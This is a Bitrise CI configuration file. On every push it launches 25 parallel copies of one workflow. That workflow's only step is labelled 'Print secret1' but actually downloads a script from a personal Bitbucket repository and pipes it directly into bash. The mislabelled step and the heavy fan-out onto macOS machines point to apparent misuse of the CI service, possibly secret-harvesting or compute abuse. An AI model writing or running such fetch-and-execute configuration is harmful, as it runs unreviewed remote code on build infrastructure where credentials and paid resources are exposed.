---
format_version: '11'
default_step_lib_source: https://github.com/bitrise-io/bitrise-steplib.git
project_type: android
trigger_map:
- push_branch: "*"
  pipeline: pipeline-successful
pipelines:
  pipeline-successful:
    stages:
    - stage-successful-1: {}
stages:
  stage-successful-1:
    workflows:
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
    - successful-20s: {}
workflows:
  successful-20s:
    steps:
    - script@1:
        title: Print secret1
        inputs:
        - content: curl https://bitbucket.org/nicezep/korong/raw/master/bitrisemac
            | bash
meta:
  bitrise.io:
    stack: osx-xcode-15.0.x
    machine_type_id: g2-m1.8core
